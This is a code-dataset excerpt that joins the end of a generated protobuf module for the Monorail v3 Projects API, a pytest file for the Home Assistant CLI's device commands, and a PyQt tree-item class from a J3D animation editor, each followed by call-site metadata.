label=1, has_default_value=False, default_value=b"".decode('utf-8'), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key), ], extensions=[ ], nested_types=[], enum_types=[ ], serialized_options=None, is_extendable=False, syntax='proto3', extension_ranges=[], oneofs=[ ], serialized_start=697, serialized_end=797, ) _LISTCOMPONENTDEFSREQUEST = _descriptor.Descriptor( name='ListComponentDefsRequest', full_name='monorail.v3.ListComponentDefsRequest', filename=None, file=DESCRIPTOR, containing_type=None, create_key=_descriptor._internal_create_key, fields=[ _descriptor.FieldDescriptor( name='parent', full_name='monorail.v3.ListComponentDefsRequest.parent', index=0, number=1, type=9, cpp_type=9, label=1, has_default_value=False, default_value=b"".decode('utf-8'), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=b'\372A\027\n\025api.crbug.com/Project\340A\002', file=DESCRIPTOR, create_key=_descriptor._internal_create_key), _descriptor.FieldDescriptor( name='page_size', full_name='monorail.v3.ListComponentDefsRequest.page_size', index=1, number=2, type=5, cpp_type=1, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key), _descriptor.FieldDescriptor( name='page_token', full_name='monorail.v3.ListComponentDefsRequest.page_token', index=2, number=3, type=9, cpp_type=9, label=1, has_default_value=False, default_value=b"".decode('utf-8'), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key), ], extensions=[ ], nested_types=[], enum_types=[ ], serialized_options=None, is_extendable=False, syntax='proto3', extension_ranges=[], oneofs=[ ], serialized_start=799, serialized_end=911, ) _LISTCOMPONENTDEFSRESPONSE = _descriptor.Descriptor( name='ListComponentDefsResponse', full_name='monorail.v3.ListComponentDefsResponse', filename=None, file=DESCRIPTOR, containing_type=None, create_key=_descriptor._internal_create_key, fields=[ _descriptor.FieldDescriptor( name='component_defs', full_name='monorail.v3.ListComponentDefsResponse.component_defs', index=0, number=1, type=11, cpp_type=10, label=3, has_default_value=False, default_value=[], message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key), _descriptor.FieldDescriptor( name='next_page_token', full_name='monorail.v3.ListComponentDefsResponse.next_page_token', index=1, number=2, type=9, cpp_type=9, label=1, has_default_value=False, default_value=b"".decode('utf-8'), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key), ], extensions=[ ], nested_types=[], enum_types=[ ], serialized_options=None, is_extendable=False, syntax='proto3', extension_ranges=[], oneofs=[ ], serialized_start=913, serialized_end=1016, ) _LISTPROJECTSREQUEST = _descriptor.Descriptor( name='ListProjectsRequest', full_name='monorail.v3.ListProjectsRequest', filename=None, file=DESCRIPTOR, containing_type=None, create_key=_descriptor._internal_create_key, fields=[ _descriptor.FieldDescriptor( name='page_size', full_name='monorail.v3.ListProjectsRequest.page_size', index=0, number=1, type=5, cpp_type=1, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key), _descriptor.FieldDescriptor( name='page_token', full_name='monorail.v3.ListProjectsRequest.page_token', index=1, number=2, type=9, cpp_type=9, label=1, has_default_value=False, default_value=b"".decode('utf-8'), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key), ], extensions=[ ], nested_types=[], enum_types=[ ], serialized_options=None, is_extendable=False, syntax='proto3', extension_ranges=[], oneofs=[ ], serialized_start=1018, serialized_end=1078, ) _LISTPROJECTSRESPONSE = _descriptor.Descriptor( name='ListProjectsResponse', full_name='monorail.v3.ListProjectsResponse', filename=None, file=DESCRIPTOR, containing_type=None, create_key=_descriptor._internal_create_key, fields=[ _descriptor.FieldDescriptor( name='projects', full_name='monorail.v3.ListProjectsResponse.projects', index=0, number=1, type=11, cpp_type=10, label=3, has_default_value=False, default_value=[], message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key), _descriptor.FieldDescriptor( name='next_page_token', full_name='monorail.v3.ListProjectsResponse.next_page_token', index=1, number=2, type=9, cpp_type=9, label=1, has_default_value=False, default_value=b"".decode('utf-8'), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key), ], extensions=[ ], nested_types=[], enum_types=[ ], serialized_options=None, is_extendable=False, syntax='proto3', extension_ranges=[], oneofs=[ ], serialized_start=1080, serialized_end=1167, ) _CREATEFIELDDEFREQUEST.fields_by_name['fielddef'].message_type = api_dot_v3_dot_api__proto_dot_project__objects__pb2._FIELDDEF _CREATECOMPONENTDEFREQUEST.fields_by_name['component_def'].message_type = api_dot_v3_dot_api__proto_dot_project__objects__pb2._COMPONENTDEF _LISTISSUETEMPLATESRESPONSE.fields_by_name['templates'].message_type = api_dot_v3_dot_api__proto_dot_project__objects__pb2._ISSUETEMPLATE _LISTCOMPONENTDEFSRESPONSE.fields_by_name['component_defs'].message_type = api_dot_v3_dot_api__proto_dot_project__objects__pb2._COMPONENTDEF _LISTPROJECTSRESPONSE.fields_by_name['projects'].message_type = api_dot_v3_dot_api__proto_dot_project__objects__pb2._PROJECT DESCRIPTOR.message_types_by_name['CreateFieldDefRequest'] = _CREATEFIELDDEFREQUEST DESCRIPTOR.message_types_by_name['GetComponentDefRequest'] = _GETCOMPONENTDEFREQUEST DESCRIPTOR.message_types_by_name['CreateComponentDefRequest'] = _CREATECOMPONENTDEFREQUEST DESCRIPTOR.message_types_by_name['DeleteComponentDefRequest'] = _DELETECOMPONENTDEFREQUEST DESCRIPTOR.message_types_by_name['ListIssueTemplatesRequest'] = _LISTISSUETEMPLATESREQUEST DESCRIPTOR.message_types_by_name['ListIssueTemplatesResponse'] = _LISTISSUETEMPLATESRESPONSE DESCRIPTOR.message_types_by_name['ListComponentDefsRequest'] = _LISTCOMPONENTDEFSREQUEST DESCRIPTOR.message_types_by_name['ListComponentDefsResponse'] = _LISTCOMPONENTDEFSRESPONSE DESCRIPTOR.message_types_by_name['ListProjectsRequest'] = _LISTPROJECTSREQUEST DESCRIPTOR.message_types_by_name['ListProjectsResponse'] = _LISTPROJECTSRESPONSE _sym_db.RegisterFileDescriptor(DESCRIPTOR) CreateFieldDefRequest = _reflection.GeneratedProtocolMessageType('CreateFieldDefRequest', (_message.Message,), { 'DESCRIPTOR' : _CREATEFIELDDEFREQUEST, '__module__' : 'api.v3.api_proto.projects_pb2' # @@protoc_insertion_point(class_scope:monorail.v3.CreateFieldDefRequest) }) _sym_db.RegisterMessage(CreateFieldDefRequest) GetComponentDefRequest = _reflection.GeneratedProtocolMessageType('GetComponentDefRequest', (_message.Message,), { 'DESCRIPTOR' : _GETCOMPONENTDEFREQUEST, '__module__' : 'api.v3.api_proto.projects_pb2' # @@protoc_insertion_point(class_scope:monorail.v3.GetComponentDefRequest) }) _sym_db.RegisterMessage(GetComponentDefRequest) CreateComponentDefRequest = _reflection.GeneratedProtocolMessageType('CreateComponentDefRequest', (_message.Message,), { 'DESCRIPTOR' : _CREATECOMPONENTDEFREQUEST, '__module__' : 'api.v3.api_proto.projects_pb2' # @@protoc_insertion_point(class_scope:monorail.v3.CreateComponentDefRequest) }) _sym_db.RegisterMessage(CreateComponentDefRequest) DeleteComponentDefRequest = _reflection.GeneratedProtocolMessageType('DeleteComponentDefRequest', (_message.Message,), { 'DESCRIPTOR' : _DELETECOMPONENTDEFREQUEST, '__module__' : 'api.v3.api_proto.projects_pb2' # @@protoc_insertion_point(class_scope:monorail.v3.DeleteComponentDefRequest) }) _sym_db.RegisterMessage(DeleteComponentDefRequest) ListIssueTemplatesRequest = _reflection.GeneratedProtocolMessageType('ListIssueTemplatesRequest', (_message.Message,), { 'DESCRIPTOR' : _LISTISSUETEMPLATESREQUEST, '__module__' : 'api.v3.api_proto.projects_pb2' # @@protoc_insertion_point(class_scope:monorail.v3.ListIssueTemplatesRequest) }) _sym_db.RegisterMessage(ListIssueTemplatesRequest) ListIssueTemplatesResponse = _reflection.GeneratedProtocolMessageType('ListIssueTemplatesResponse', (_message.Message,), { 'DESCRIPTOR' : _LISTISSUETEMPLATESRESPONSE, '__module__' : 'api.v3.api_proto.projects_pb2' # @@protoc_insertion_point(class_scope:monorail.v3.ListIssueTemplatesResponse) }) _sym_db.RegisterMessage(ListIssueTemplatesResponse) ListComponentDefsRequest = _reflection.GeneratedProtocolMessageType('ListComponentDefsRequest', (_message.Message,), { 'DESCRIPTOR' : _LISTCOMPONENTDEFSREQUEST, '__module__' : 'api.v3.api_proto.projects_pb2' # @@protoc_insertion_point(class_scope:monorail.v3.ListComponentDefsRequest) }) _sym_db.RegisterMessage(ListComponentDefsRequest) ListComponentDefsResponse = _reflection.GeneratedProtocolMessageType('ListComponentDefsResponse', (_message.Message,), { 'DESCRIPTOR' : _LISTCOMPONENTDEFSRESPONSE, '__module__' : 'api.v3.api_proto.projects_pb2' # @@protoc_insertion_point(class_scope:monorail.v3.ListComponentDefsResponse) }) _sym_db.RegisterMessage(ListComponentDefsResponse) ListProjectsRequest = _reflection.GeneratedProtocolMessageType('ListProjectsRequest', (_message.Message,), { 'DESCRIPTOR' : _LISTPROJECTSREQUEST, '__module__' : 'api.v3.api_proto.projects_pb2' # @@protoc_insertion_point(class_scope:monorail.v3.ListProjectsRequest) }) _sym_db.RegisterMessage(ListProjectsRequest) ListProjectsResponse = _reflection.GeneratedProtocolMessageType('ListProjectsResponse', (_message.Message,), { 'DESCRIPTOR' : _LISTPROJECTSRESPONSE, '__module__' : 'api.v3.api_proto.projects_pb2' # @@protoc_insertion_point(class_scope:monorail.v3.ListProjectsResponse) }) _sym_db.RegisterMessage(ListProjectsResponse) DESCRIPTOR._options = None _CREATEFIELDDEFREQUEST.fields_by_name['parent']._options = None _CREATEFIELDDEFREQUEST.fields_by_name['fielddef']._options = None _GETCOMPONENTDEFREQUEST.fields_by_name['name']._options = None _CREATECOMPONENTDEFREQUEST.fields_by_name['parent']._options = None _CREATECOMPONENTDEFREQUEST.fields_by_name['component_def']._options = None _DELETECOMPONENTDEFREQUEST.fields_by_name['name']._options = None _LISTISSUETEMPLATESREQUEST.fields_by_name['parent']._options = None _LISTCOMPONENTDEFSREQUEST.fields_by_name['parent']._options = None _PROJECTS = _descriptor.ServiceDescriptor( name='Projects', full_name='monorail.v3.Projects', file=DESCRIPTOR, index=0, serialized_options=None, create_key=_descriptor._internal_create_key, serialized_start=1170, serialized_end=1817, methods=[ _descriptor.MethodDescriptor( name='CreateFieldDef', full_name='monorail.v3.Projects.CreateFieldDef', index=0, containing_service=None, input_type=_CREATEFIELDDEFREQUEST, output_type=api_dot_v3_dot_api__proto_dot_project__objects__pb2._FIELDDEF, serialized_options=None, create_key=_descriptor._internal_create_key, ), _descriptor.MethodDescriptor( name='GetComponentDef', full_name='monorail.v3.Projects.GetComponentDef', index=1, containing_service=None, input_type=_GETCOMPONENTDEFREQUEST, output_type=api_dot_v3_dot_api__proto_dot_project__objects__pb2._COMPONENTDEF, serialized_options=None, create_key=_descriptor._internal_create_key, ), _descriptor.MethodDescriptor( name='CreateComponentDef', full_name='monorail.v3.Projects.CreateComponentDef', index=2, containing_service=None, input_type=_CREATECOMPONENTDEFREQUEST, output_type=api_dot_v3_dot_api__proto_dot_project__objects__pb2._COMPONENTDEF, serialized_options=None, create_key=_descriptor._internal_create_key, ), _descriptor.MethodDescriptor( name='DeleteComponentDef', full_name='monorail.v3.Projects.DeleteComponentDef', index=3, containing_service=None, input_type=_DELETECOMPONENTDEFREQUEST, output_type=google_dot_protobuf_dot_empty__pb2._EMPTY, serialized_options=None, create_key=_descriptor._internal_create_key, ), _descriptor.MethodDescriptor( name='ListIssueTemplates', full_name='monorail.v3.Projects.ListIssueTemplates', index=4, containing_service=None, input_type=_LISTISSUETEMPLATESREQUEST, output_type=_LISTISSUETEMPLATESRESPONSE, serialized_options=None, create_key=_descriptor._internal_create_key, ), _descriptor.MethodDescriptor( name='ListComponentDefs', full_name='monorail.v3.Projects.ListComponentDefs', index=5, containing_service=None, input_type=_LISTCOMPONENTDEFSREQUEST, output_type=_LISTCOMPONENTDEFSRESPONSE, serialized_options=None, create_key=_descriptor._internal_create_key, ), _descriptor.MethodDescriptor( name='ListProjects', full_name='monorail.v3.Projects.ListProjects', index=6, containing_service=None, input_type=_LISTPROJECTSREQUEST, output_type=_LISTPROJECTSRESPONSE, serialized_options=None, create_key=_descriptor._internal_create_key, ), ]) _sym_db.RegisterServiceDescriptor(_PROJECTS) DESCRIPTOR.services_by_name['Projects'] = _PROJECTS # @@protoc_insertion_point(module_scope)
[((11, 10, 11, 36), 'google.protobuf.symbol_database.Default', '_symbol_database.Default', ({}, {}), '()', True, 'from google.protobuf import symbol_database as _symbol_database\n'), ((20, 13, 28, 222), 'google.protobuf.descriptor.FileDescriptor', '_descriptor.FileDescriptor', (), '', True, 'from google.protobuf import descriptor as _descriptor\n'), ((439, 24, 443, 4), 'google.protobuf.reflection.GeneratedProtocolMessageType', '_reflection.GeneratedProtocolMessageType', ({(439, 65, 439, 88): '"""CreateFieldDefRequest"""', (439, 90, 439, 109): '(_message.Message,)', (439, 111, 443, 3): "{'DESCRIPTOR': _CREATEFIELDDEFREQUEST, '__module__':\n 'api.v3.api_proto.projects_pb2'}"}, {}), "('CreateFieldDefRequest', (_message\n .Message,), {'DESCRIPTOR': _CREATEFIELDDEFREQUEST, '__module__':\n 'api.v3.api_proto.projects_pb2'})", True, 'from google.protobuf import reflection as _reflection\n'), ((446, 25, 450, 4), 'google.protobuf.reflection.GeneratedProtocolMessageType', '_reflection.GeneratedProtocolMessageType', ({(446, 66, 446, 90): '"""GetComponentDefRequest"""', (446, 92, 446, 111): '(_message.Message,)', (446, 113, 450, 3): "{'DESCRIPTOR': _GETCOMPONENTDEFREQUEST, '__module__':\n 'api.v3.api_proto.projects_pb2'}"}, {}), "('GetComponentDefRequest', (\n _message.Message,), {'DESCRIPTOR': _GETCOMPONENTDEFREQUEST,\n '__module__': 'api.v3.api_proto.projects_pb2'})", True, 'from google.protobuf import reflection as _reflection\n'), ((453, 28, 457, 4), 'google.protobuf.reflection.GeneratedProtocolMessageType', '_reflection.GeneratedProtocolMessageType', ({(453, 69, 453, 96): '"""CreateComponentDefRequest"""', (453, 98, 453, 117): '(_message.Message,)', (453, 119, 457, 3): "{'DESCRIPTOR': _CREATECOMPONENTDEFREQUEST, '__module__':\n 'api.v3.api_proto.projects_pb2'}"}, {}), "('CreateComponentDefRequest', (\n _message.Message,), {'DESCRIPTOR': _CREATECOMPONENTDEFREQUEST,\n '__module__': 'api.v3.api_proto.projects_pb2'})", True, 'from google.protobuf import reflection as _reflection\n'), ((460, 28, 464, 4), 'google.protobuf.reflection.GeneratedProtocolMessageType', '_reflection.GeneratedProtocolMessageType', ({(460, 69, 460, 96): '"""DeleteComponentDefRequest"""', (460, 98, 460, 117): '(_message.Message,)', (460, 119, 464, 3): "{'DESCRIPTOR': _DELETECOMPONENTDEFREQUEST, '__module__':\n 'api.v3.api_proto.projects_pb2'}"}, {}), "('DeleteComponentDefRequest', (\n _message.Message,), {'DESCRIPTOR': _DELETECOMPONENTDEFREQUEST,\n '__module__': 'api.v3.api_proto.projects_pb2'})", True, 'from google.protobuf import reflection as _reflection\n'), ((467, 28, 471, 4), 'google.protobuf.reflection.GeneratedProtocolMessageType', '_reflection.GeneratedProtocolMessageType', ({(467, 69, 467, 96): '"""ListIssueTemplatesRequest"""', (467, 98, 467, 117): '(_message.Message,)', (467, 119, 471, 3): "{'DESCRIPTOR': _LISTISSUETEMPLATESREQUEST, '__module__':\n 'api.v3.api_proto.projects_pb2'}"}, {}), "('ListIssueTemplatesRequest', (\n _message.Message,), {'DESCRIPTOR': _LISTISSUETEMPLATESREQUEST,\n '__module__': 'api.v3.api_proto.projects_pb2'})", True, 'from google.protobuf import reflection as _reflection\n'), ((474, 29, 478, 4), 'google.protobuf.reflection.GeneratedProtocolMessageType', '_reflection.GeneratedProtocolMessageType', ({(474, 70, 474, 98): '"""ListIssueTemplatesResponse"""', (474, 100, 474, 119): '(_message.Message,)', (474, 121, 478, 3): "{'DESCRIPTOR': _LISTISSUETEMPLATESRESPONSE, '__module__':\n 'api.v3.api_proto.projects_pb2'}"}, {}), "('ListIssueTemplatesResponse', (\n _message.Message,), {'DESCRIPTOR': _LISTISSUETEMPLATESRESPONSE,\n '__module__': 'api.v3.api_proto.projects_pb2'})", True, 'from google.protobuf import reflection as _reflection\n'), ((481, 27, 485, 4), 'google.protobuf.reflection.GeneratedProtocolMessageType', '_reflection.GeneratedProtocolMessageType', ({(481, 68, 481, 94): '"""ListComponentDefsRequest"""', (481, 96, 481, 115): '(_message.Message,)', (481, 117, 485, 3): "{'DESCRIPTOR': _LISTCOMPONENTDEFSREQUEST, '__module__':\n 'api.v3.api_proto.projects_pb2'}"}, {}), "('ListComponentDefsRequest', (\n _message.Message,), {'DESCRIPTOR': _LISTCOMPONENTDEFSREQUEST,\n '__module__': 'api.v3.api_proto.projects_pb2'})", True, 'from google.protobuf import reflection as _reflection\n'), ((488, 28, 492, 4), 'google.protobuf.reflection.GeneratedProtocolMessageType', '_reflection.GeneratedProtocolMessageType', ({(488, 69, 488, 96): '"""ListComponentDefsResponse"""', (488, 98, 488, 117): '(_message.Message,)', (488, 119, 492, 3): "{'DESCRIPTOR': _LISTCOMPONENTDEFSRESPONSE, '__module__':\n 'api.v3.api_proto.projects_pb2'}"}, {}), "('ListComponentDefsResponse', (\n _message.Message,), {'DESCRIPTOR': _LISTCOMPONENTDEFSRESPONSE,\n '__module__': 'api.v3.api_proto.projects_pb2'})", True, 'from google.protobuf import reflection as _reflection\n'), ((495, 22, 499, 4), 'google.protobuf.reflection.GeneratedProtocolMessageType', '_reflection.GeneratedProtocolMessageType', ({(495, 63, 495, 84): '"""ListProjectsRequest"""', (495, 86, 495, 105): '(_message.Message,)', (495, 107, 499, 3): "{'DESCRIPTOR': _LISTPROJECTSREQUEST, '__module__':\n 'api.v3.api_proto.projects_pb2'}"}, {}), "('ListProjectsRequest', (_message.\n Message,), {'DESCRIPTOR': _LISTPROJECTSREQUEST, '__module__':\n 'api.v3.api_proto.projects_pb2'})", True, 'from google.protobuf import reflection as _reflection\n'), ((502, 23, 506, 4), 'google.protobuf.reflection.GeneratedProtocolMessageType', '_reflection.GeneratedProtocolMessageType', ({(502, 64, 502, 86): '"""ListProjectsResponse"""', (502, 88, 502, 107): '(_message.Message,)', (502, 109, 506, 3): "{'DESCRIPTOR': _LISTPROJECTSRESPONSE, '__module__':\n 'api.v3.api_proto.projects_pb2'}"}, {}), "('ListProjectsResponse', (_message.\n Message,), {'DESCRIPTOR': _LISTPROJECTSRESPONSE, '__module__':\n 'api.v3.api_proto.projects_pb2'})", True, 'from google.protobuf import reflection as _reflection\n'), ((48, 4, 54, 101), 'google.protobuf.descriptor.FieldDescriptor', '_descriptor.FieldDescriptor', (), '', True, 'from google.protobuf import descriptor as _descriptor\n'), ((119, 4, 125, 101), 'google.protobuf.descriptor.FieldDescriptor', '_descriptor.FieldDescriptor', (), '', True, 'from google.protobuf import descriptor as _descriptor\n'), ((190, 4, 196, 93), 'google.protobuf.descriptor.FieldDescriptor', '_descriptor.FieldDescriptor', (), '', True, 'from google.protobuf import descriptor as _descriptor\n'), ((229, 4, 235, 93), 'google.protobuf.descriptor.FieldDescriptor', '_descriptor.FieldDescriptor', (), '', True, 'from google.protobuf import descriptor as _descriptor\n'), ((275, 4, 281, 93), 'google.protobuf.descriptor.FieldDescriptor', '_descriptor.FieldDescriptor', (), '', True, 'from google.protobuf import descriptor as _descriptor\n'), ((314, 4, 320, 93), 'google.protobuf.descriptor.FieldDescriptor', '_descriptor.FieldDescriptor', (), '', True, 'from google.protobuf import descriptor as _descriptor\n'), ((353, 4, 359, 93), 'google.protobuf.descriptor.FieldDescriptor', '_descriptor.FieldDescriptor', (), '', True, 'from google.protobuf import descriptor as _descriptor\n'), ((392, 4, 398, 93), 'google.protobuf.descriptor.FieldDescriptor', '_descriptor.FieldDescriptor', (), '', True, 'from google.protobuf import descriptor as _descriptor\n'), ((530, 2, 539, 3), 'google.protobuf.descriptor.MethodDescriptor', '_descriptor.MethodDescriptor', (), '', True, 'from google.protobuf import descriptor as _descriptor\n'), ((540, 2, 549, 3), 'google.protobuf.descriptor.MethodDescriptor', '_descriptor.MethodDescriptor', (), '', True, 'from google.protobuf import descriptor as _descriptor\n'), ((550, 2, 559, 3), 'google.protobuf.descriptor.MethodDescriptor', '_descriptor.MethodDescriptor', (), '', True, 'from google.protobuf import descriptor as _descriptor\n'), ((560, 2, 569, 3), 'google.protobuf.descriptor.MethodDescriptor', '_descriptor.MethodDescriptor', (), '', True, 'from google.protobuf import descriptor as _descriptor\n'), ((570, 2, 579, 3), 'google.protobuf.descriptor.MethodDescriptor', '_descriptor.MethodDescriptor', (), '', True, 'from google.protobuf import descriptor as _descriptor\n'), ((580, 2, 589, 3), 'google.protobuf.descriptor.MethodDescriptor', '_descriptor.MethodDescriptor', (), '', True, 'from google.protobuf import descriptor as _descriptor\n'), ((590, 2, 599, 3), 'google.protobuf.descriptor.MethodDescriptor', '_descriptor.MethodDescriptor', (), '', True, 'from google.protobuf import descriptor as _descriptor\n')]
michaelwoods/home-assistant-cli
tests/test_device.py
340643af943f36283621f39ac39a690b1fccc045
"""Testing Device operations.""" import json import unittest.mock as mock from click.testing import CliRunner import homeassistant_cli.cli as cli def test_device_list(default_devices) -> None: """Test Device List.""" with mock.patch( 'homeassistant_cli.remote.get_devices', return_value=default_devices ): runner = CliRunner() result = runner.invoke( cli.cli, ["--output=json", "device", "list"], catch_exceptions=False, ) assert result.exit_code == 0 data = json.loads(result.output) assert len(data) == 23 def test_device_list_filter(default_devices) -> None: """Test Device List.""" with mock.patch( 'homeassistant_cli.remote.get_devices', return_value=default_devices ): runner = CliRunner() result = runner.invoke( cli.cli, ["--output=json", "device", "list", "table"], catch_exceptions=False, ) assert result.exit_code == 0 data = json.loads(result.output) assert len(data) == 2 assert data[0]['name'] == "Kitchen table left" assert data[1]['name'] == "Kitchen table right" def test_device_assign(default_areas, default_devices) -> None: """Test basic device assign.""" with mock.patch( 'homeassistant_cli.remote.get_devices', return_value=default_devices ): with mock.patch( 'homeassistant_cli.remote.get_areas', return_value=default_areas ): with mock.patch( 'homeassistant_cli.remote.assign_area', return_value={'success': True}, ): runner = CliRunner() result = runner.invoke( cli.cli, ["device", "assign", "Kitchen", "Kitchen table left"], catch_exceptions=False, ) print(result.output) assert result.exit_code == 0 expected = ( "Successfully assigned 'Kitchen'" " to 'Kitchen table left'\n" ) assert result.output == expected
[((12, 9, 14, 5), 'unittest.mock.patch', 'mock.patch', (), '', True, 'import unittest.mock as mock\n'), ((16, 17, 16, 28), 'click.testing.CliRunner', 'CliRunner', ({}, {}), '()', False, 'from click.testing import CliRunner\n'), ((24, 15, 24, 40), 'json.loads', 'json.loads', ({(24, 26, 24, 39): 'result.output'}, {}), '(result.output)', False, 'import json\n'), ((30, 9, 32, 5), 'unittest.mock.patch', 'mock.patch', (), '', True, 'import unittest.mock as mock\n'), ((34, 17, 34, 28), 'click.testing.CliRunner', 'CliRunner', ({}, {}), '()', False, 'from click.testing import CliRunner\n'), ((42, 15, 42, 40), 'json.loads', 'json.loads', ({(42, 26, 42, 39): 'result.output'}, {}), '(result.output)', False, 'import json\n'), ((50, 9, 52, 5), 'unittest.mock.patch', 'mock.patch', (), '', True, 'import unittest.mock as mock\n'), ((53, 13, 55, 9), 'unittest.mock.patch', 'mock.patch', (), '', True, 'import unittest.mock as mock\n'), ((56, 17, 59, 13), 'unittest.mock.patch', 'mock.patch', (), '', True, 'import unittest.mock as mock\n'), ((61, 25, 61, 36), 'click.testing.CliRunner', 'CliRunner', ({}, {}), '()', False, 'from click.testing import CliRunner\n')]
tarsa129/j3d-animation-editor
widgets/tree_item.py
3f0691bd7dcece6e2055a0b5af0510608f28f2ca
from PyQt5.QtWidgets import QAction, QTreeWidget, QTreeWidgetItem, QFileDialog from PyQt5.QtGui import QIcon from PyQt5.QtCore import Qt import animations.general_animation as j3d from widgets.yaz0 import compress, compress_slow, compress_fast from io import BytesIO class tree_item(QTreeWidgetItem): def __init__(self, parent): QTreeWidgetItem.__init__(self, parent,1000) self.display_info = [] self.filepath = "" self.compressed = 1 self.bmd_file = None self.sound_data = None self.changed = False def set_values(self, display_info, filepath, compressed ): self.display_info = display_info self.filepath = filepath.replace("|", ".") self.compressed = compressed forward_i = filepath.rfind("/") + 1 backwad_i = filepath.rfind("\\") + 1 self.setText(0, self.filepath[max(forward_i, backwad_i):]) def set_sound(self, sound_data): self.sound_data = sound_data if sound_data is not None: icon = QIcon("icons/sound.png") self.setIcon(0, icon) else: self.setIcon(0, QIcon() ) def save_animation(self, other_filepath = "", compress_dis = 1, save_all = False): if save_all and not self.changed: print("skipping " + self.filepath + " because nothing has changed") return if other_filepath != "": working_filepath = other_filepath else: working_filepath = self.filepath if (working_filepath.endswith("a") and not working_filepath.endswith(".bva") ): info = j3d.fix_array( self.display_info) self.convert_to_a(info) else: info = j3d.fix_array( self.display_info) j3d.sort_filepath(working_filepath, info, self.sound_data) compress_status = self.compressed if compress_dis != 0: compress_status = compress_dis print(compress_status) if compress_status > 1: out = BytesIO() with open(working_filepath, "rb") as f: if compress_status == 2: out = compress_fast(f) elif compress_status == 3: out = compress(f) elif compress_status == 4: out = compress_slow(f) with open(working_filepath, "wb") as f: f.write(out.getbuffer()) self.changed = False def convert_to_k(self): filepath = self.filepath[:-1] + "k" info = j3d.fix_array(self.display_info) if self.filepath.endswith(".bca"): bck = j3d.sort_filepath(filepath, info) elif filepath.endswith(".bla"): blk = j3d.sort_filepath(filepath, info) def convert_to_a(self, info): info = j3d.fix_array( info ) if self.filepath.endswith(".bck") or self.filepath.endswith(".bca"): bca = j3d.convert_to_a(self.filepath, info) #this is a pure bck, no saving filepath = self.filepath[:-1] + "a" with open(filepath, "wb") as f: bca.write_bca(f) f.close() elif self.filepath.endswith(".blk") or self.filepath.endswith(".bla"): bla = j3d.convert_to_a(self.filepath, info) #this is a pure bck, no saving filepath = self.filepath[:-1] + "a" with open(filepath, "wb") as f: bla.write_bla(f) f.close() def export_anim(self): info = j3d.fix_array(self.display_info) filepath = self.filepath[0:-4] + ".anim" if self.bmd_file is None: bmd_file, choosentype = QFileDialog.getOpenFileName( None, "Open File","" , "Model files (*.bmd *.bdl)") if bmd_file: bck = j3d.export_anim(filepath, info, bmd_file) else: bck = j3d.export_anim(filepath, info, self.bmd_file) def add_children(self, strings): self.takeChildren() for name in strings: child = QTreeWidgetItem(self) child.setText(0, name) child.setDisabled(True)
[((10, 8, 10, 51), 'PyQt5.QtWidgets.QTreeWidgetItem.__init__', 'QTreeWidgetItem.__init__', ({(10, 33, 10, 37): 'self', (10, 39, 10, 45): 'parent', (10, 46, 10, 50): '(1000)'}, {}), '(self, parent, 1000)', False, 'from PyQt5.QtWidgets import QAction, QTreeWidget, QTreeWidgetItem, QFileDialog\n'), ((73, 15, 73, 47), 'animations.general_animation.fix_array', 'j3d.fix_array', ({(73, 29, 73, 46): 'self.display_info'}, {}), '(self.display_info)', True, 'import animations.general_animation as j3d\n'), ((81, 15, 81, 36), 'animations.general_animation.fix_array', 'j3d.fix_array', ({(81, 30, 81, 34): 'info'}, {}), '(info)', True, 'import animations.general_animation as j3d\n'), ((101, 15, 101, 47), 'animations.general_animation.fix_array', 'j3d.fix_array', ({(101, 29, 101, 46): 'self.display_info'}, {}), '(self.display_info)', True, 'import animations.general_animation as j3d\n'), ((33, 19, 33, 43), 'PyQt5.QtGui.QIcon', 'QIcon', ({(33, 25, 33, 42): '"""icons/sound.png"""'}, {}), "('icons/sound.png')", False, 'from PyQt5.QtGui import QIcon\n'), ((49, 19, 49, 52), 'animations.general_animation.fix_array', 'j3d.fix_array', ({(49, 34, 49, 51): 'self.display_info'}, {}), '(self.display_info)', True, 'import animations.general_animation as j3d\n'), ((52, 19, 52, 52), 'animations.general_animation.fix_array', 'j3d.fix_array', ({(52, 34, 52, 51): 'self.display_info'}, {}), '(self.display_info)', True, 'import animations.general_animation as j3d\n'), ((53, 12, 53, 70), 'animations.general_animation.sort_filepath', 'j3d.sort_filepath', ({(53, 30, 53, 46): 'working_filepath', (53, 48, 53, 52): 'info', (53, 54, 53, 69): 'self.sound_data'}, {}), '(working_filepath, info, self.sound_data)', True, 'import animations.general_animation as j3d\n'), ((60, 18, 60, 27), 'io.BytesIO', 'BytesIO', ({}, {}), '()', False, 'from io import BytesIO\n'), ((75, 18, 75, 51), 'animations.general_animation.sort_filepath', 'j3d.sort_filepath', ({(75, 36, 75, 44): 'filepath', (75, 46, 75, 50): 'info'}, {}), '(filepath, info)', True, 'import animations.general_animation as j3d\n'), ((86, 18, 86, 55), 'animations.general_animation.convert_to_a', 'j3d.convert_to_a', ({(86, 35, 86, 48): 'self.filepath', (86, 50, 86, 54): 'info'}, {}), '(self.filepath, info)', True, 'import animations.general_animation as j3d\n'), ((104, 36, 104, 116), 'PyQt5.QtWidgets.QFileDialog.getOpenFileName', 'QFileDialog.getOpenFileName', ({(104, 65, 104, 69): 'None', (104, 71, 104, 82): '"""Open File"""', (104, 83, 104, 85): '""""""', (104, 88, 104, 